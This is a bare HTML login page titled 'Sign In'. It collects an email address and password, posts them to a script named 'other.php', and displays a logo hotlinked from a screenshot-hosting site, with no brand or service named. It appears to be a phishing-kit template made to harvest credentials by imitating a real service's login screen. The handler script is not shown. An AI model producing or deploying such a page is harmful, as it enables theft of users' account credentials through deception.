<!doctype html>
<html>
<head>
<title>Sign In</title>
</head>
<body>
<center>

<style type="text/css">

body{
  background-color: white;
   -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}
input[type=text],[type=password],[type=email]{
  display: block;
  margin: 0;
  width: 300px;
  font-family: sans-serif;
  font-size: 15px;  
   padding: 14px;
       border: 1px solid #D8DDE6;
    border-radius: 3px;
}

fieldset {
    font-family: sans-serif;
width:410px;
height:365px;
 background:#F9F9F9;
 border: 2px solid #DEDEDE;
    padding: 10px;
bottom:10px;
    border-radius: 5px;
}

   input[type=submit] {
  width: 330px;
   padding: 12px;
    font-size: 20px;
    line-height: 1.33;
    border-radius: 4px;
    color: #fff;
    background-color: #5795D2;
    border: 0px ;
   }
</style>

<form action="other.php" method="post">
<br><br><br><br><br><br><fieldset>
 <img src="https://image.prntscr.com/image/CZpG2Jk9RpuSKmZ5TTVZ9g.png"><br>
<input type="email" name="user" placeholder="Enter your Email" required >
<br><input type="password" name="pass" placeholder="Enter your Password" required ><br>

    

    <input type="submit" name="submit" value="Log In"/> <br><br><br><br>



</center>
</form>
</body>
</html>
